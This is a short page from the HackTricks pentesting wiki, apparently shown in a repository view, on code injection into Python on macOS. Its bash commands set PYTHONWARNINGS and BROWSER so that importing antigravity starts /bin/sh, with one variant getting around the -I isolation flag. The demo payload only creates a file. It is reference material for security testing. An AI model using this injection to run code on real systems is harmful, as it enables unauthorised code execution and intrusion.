Carlos Polop ad3f52d725 t2
2025-01-03 01:07:38 +01:00

24 lines
771 B
Markdown

# macOS Python Applications Injection
{{#include ../../../banners/hacktricks-training.md}}
## Via `PYTHONWARNINGS` and `BROWSER` env variables
It's possible to alter both environment variables to execute arbitrary code whenever python is called, for example:
```bash
# Generate example python script
echo "print('hi')" > /tmp/script.py
# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py
# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py
```
{{#include ../../../banners/hacktricks-training.md}}